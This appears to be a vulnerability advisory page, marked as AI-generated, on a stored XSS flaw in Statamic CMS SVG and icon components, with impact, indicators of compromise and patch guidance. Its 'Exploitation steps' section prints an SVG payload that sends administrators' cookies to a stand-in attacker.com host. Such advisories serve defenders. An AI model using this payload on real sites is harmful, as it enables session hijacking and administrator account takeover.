CVE-2026-28426: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-28426 is a stored cross-site scripting (XSS) vulnerability in Statamic CMS, a Laravel and Git-powered content management system, that enables privilege escalation by allowing authenticated users to inject malicious JavaScript into SVG and icon-related components. The injected script executes in the browser context of higher-privileged users (e.g., administrators) who view the compromised content. Affected versions include all Statamic releases prior to 5.73.11 (v5.x branch) and versions 6.0.0 through 6.3.x (prior to 6.4.0). The vulnerability was published on February 27, 2026, with patches released the same day. It carries a CVSS v3.1 base score of 8.7 (High) per the GitHub Security Advisory (Github Advisory, Statamic Advisory).

Technical details

The root cause is improper neutralization of user-supplied input in SVG and icon-related components before rendering in the Statamic Control Panel (CWE-79). An authenticated user with permissions to upload or modify SVG assets or icon configurations can embed malicious JavaScript within SVG markup, which is then stored server-side and rendered unsanitized when viewed by other users. The fix in v5.73.11 and v6.4.0 includes explicit SVG sanitization (PR #14077 "Sanitize SVGs" and PR #14075 "Sanitize SVGs in Icon component"), as well as Antlers template engine hardening to prevent template injection chaining (Statamic Advisory, v5.73.11 Release, v6.4.0 Release). A technical write-up on dev.to describes a potential "chain reaction" scenario combining the stored XSS with Antlers template injection in the Control Panel.

Impact

Successful exploitation allows an attacker with low-level authenticated access to persistently inject JavaScript that executes in the browser session of higher-privileged users, including administrators. This can result in session hijacking, theft of administrative credentials, unauthorized modification of CMS content, and potentially full compromise of the Statamic CMS instance. Confidentiality and integrity impacts are rated High in the vendor's CVSS assessment, as an attacker could exfiltrate sensitive data or make unauthorized changes with administrator-level privileges (Github Advisory, Statamic Advisory).

Exploitability

No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time (Github Advisory). The EPSS score is approximately 0.013% (2nd percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with SVG/icon upload or modification permissions, limiting the attacker pool, though the impact upon successful exploitation is significant due to the privilege escalation potential.

Exploitation steps

  1. Gain authenticated access: Obtain a Statamic CMS account with permissions to upload SVG files or modify icon-related components (e.g., an editor or content manager role).
  2. Craft a malicious SVG payload: Create an SVG file containing embedded JavaScript, such as:
    <svg xmlns="http://www.w3.org/2000/svg">
      <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>
    </svg>
  3. Upload or inject the SVG: Upload the malicious SVG through the Statamic Control Panel's asset manager or configure it as an icon in an icon-related component field.
  4. Wait for a privileged user to view the content: The stored payload executes automatically when an administrator or higher-privileged user navigates to a Control Panel page that renders the SVG or icon component.
  5. Harvest credentials or hijack session: The JavaScript executes in the victim's browser context, enabling cookie theft, session token exfiltration, or further actions such as creating new admin accounts or modifying CMS settings (Statamic Advisory, Github Advisory).

Indicators of compromise

  • File System: SVG files in the Statamic assets directory containing <script> tags, javascript: URIs, event handlers (e.g., onload, onerror), or encoded JavaScript payloads within SVG markup.
  • Logs: Statamic or web server access logs showing uploads of SVG files by low-privileged accounts, followed by access to those assets by administrator accounts; unexpected outbound HTTP requests from administrator browsers to external domains.
  • Network: Outbound connections from administrator workstations to unfamiliar external hosts shortly after viewing Control Panel pages containing SVG or icon components; HTTP requests carrying session cookies or tokens to attacker-controlled infrastructure.
  • Application Behavior: Unexpected creation of new administrator accounts, unauthorized changes to CMS configuration or content, or new redirects/webhooks configured in the Statamic Control Panel without corresponding authorized change records.

Mitigation and workarounds

Statamic has released patched versions 5.73.11 (for the v5.x branch) and 6.4.0 (for the v6.x branch), both published on February 27, 2026. Upgrading to one of these versions is the primary recommended remediation (v5.73.11 Release, v6.4.0 Release). As interim mitigations prior to patching: restrict SVG upload and icon modification permissions to only fully trusted users; implement Content Security Policy (CSP) headers to limit JavaScript execution scope; and audit existing SVG assets and icon configurations for suspicious embedded content. Monitoring administrator activity for unauthorized changes is also advised.

Community reactions

The vulnerability was noted by several vulnerability tracking platforms and security news outlets shortly after disclosure, including The Hacker Wire and Bluesky security community accounts (Github Advisory). A dev.to post described a potential "chain reaction" attack combining the stored XSS with Antlers template injection, highlighting the broader security hardening included in the patch releases. Community reaction has been moderate, consistent with a CMS-specific vulnerability requiring authenticated access.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management